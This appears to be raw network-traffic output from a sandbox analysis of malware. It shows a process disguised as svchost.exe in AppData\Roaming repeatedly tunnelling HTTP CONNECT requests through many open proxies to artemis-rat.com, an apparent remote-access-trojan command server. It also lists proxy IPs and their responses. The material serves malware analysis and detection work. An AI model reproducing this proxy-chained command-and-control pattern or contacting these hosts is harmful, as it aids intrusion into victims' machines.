                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                    Mar 9, 2024 13:14:34.621094942 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                    Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 44


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3019192.168.2.55973643.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.078341007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3020192.168.2.557480188.164.196.316296643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.078455925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846157074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3021192.168.2.55974927.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.078555107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3022192.168.2.559819172.67.181.588043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.079010963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.233458042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3023192.168.2.559823104.18.161.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.079121113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.233550072 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3024192.168.2.559825104.24.236.2038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.079488039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.233937025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3025192.168.2.559088128.127.94.160567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.080274105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3026192.168.2.559806104.167.6.2188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.080276012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677175999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380640030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677978039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177860975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3027192.168.2.5590805.10.249.159108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.081154108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.547741890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.177689075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3028192.168.2.55979814.103.24.20800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.081386089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3029192.168.2.557580162.214.225.2235491743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.081967115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177423000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3030192.168.2.559839104.20.89.778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.082856894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.237307072 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3031192.168.2.558983220.194.189.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.084697962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3032192.168.2.55767135.209.198.2228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.087521076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846231937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3033192.168.2.55763392.204.135.376346243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.088774920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.380182981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3034192.168.2.559855104.21.218.1038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.088855982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.243143082 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3035192.168.2.559192115.96.208.124808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.091692924 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3036192.168.2.55980343.128.146.421567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.095671892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3037192.168.2.55980182.137.244.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.095772982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3038192.168.2.559866162.214.170.1443950343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.096263885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.676963091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3039192.168.2.55988238.162.3.50312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.147835970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677222013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.094505072 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3040192.168.2.5580248.210.8.1571900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.148457050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3041192.168.2.559608180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.151710033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.536485910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3042192.168.2.558959117.160.250.131889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.152141094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.845141888 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3043192.168.2.559857114.129.2.82808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.154886961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.419787884 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3044192.168.2.55982720.24.43.214812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
